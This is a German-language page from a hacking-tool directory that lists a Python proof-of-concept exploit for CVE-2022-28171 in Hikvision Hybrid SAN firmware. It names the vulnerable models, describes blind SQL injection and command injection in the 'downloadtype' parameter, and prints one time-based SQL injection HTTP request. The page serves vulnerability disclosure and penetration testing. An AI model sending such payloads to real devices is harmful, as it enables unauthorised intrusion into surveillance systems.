Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-28171-POC — Python-Exploit für CVE-2022-28171, der auf Hikvision Hybrid SAN-Geräte abzielt, blinde SQL-Einschleusung und Befehlseinschleusung automatisiert, um Remote-Code-Ausführung zu erreichen. | Kitploit
Tools/GitHubGitHub/nyameeeain/cve-2022-28171-poc
IoT-SicherheitSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubnyameeeain/cve-2022-28171-poc

CVE-2022-28171-POC

Python-Exploit für CVE-2022-28171, der auf Hikvision Hybrid SAN-Geräte abzielt, blinde SQL-Einschleusung und Befehlseinschleusung automatisiert, um Remote-Code-Ausführung zu erreichen.

Repository anzeigen
411vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-28171-POC

Ich habe dies ursprünglich auf ExploitDB veröffentlicht, das Sie unter https://www.exploit-db.com/exploits/51607 finden können.

Hikvision Hybrid SAN Ds-a71024 Firmware - Mehrere Remote-Codeausführungen

root@kitploit:~
# Date: 16  July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s

Herstellerbeschreibung:

Hikvision ist ein weltweit führender Hersteller und Lieferant von Videoüberwachungs- und Internet-of-Things (IoT)-Geräten für zivile und militärische Zwecke. Einige Hikvision Hybrid SAN-Produkte waren anfällig für mehrere Schwachstellen zur Remote-Codeausführung wie Befehlseinschleusung, blinde SQL-Injection, HTTP-Request-Schmuggel und reflektiertes Cross-Site-Scripting. Dies führte zur Remote-Codeausführung, sodass beliebige Betriebssystembefehle und mehr ausgeführt werden konnten.

Schwachstellenbeschreibung

Der manuelle Test bestätigte, dass der Parameter "downloadtype" anfällig für blinde SQL-Injection und Command Injection war. Ich habe ein Python-Skript erstellt, um SQL-Versionen zu automatisieren und aufzulisten, da die Anwendung hinter einer Firewall stand und alle Anfragen von SQLmap blockierte.

Anfragekörper

root@kitploit:~
Request Body:
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
Tool herunterladen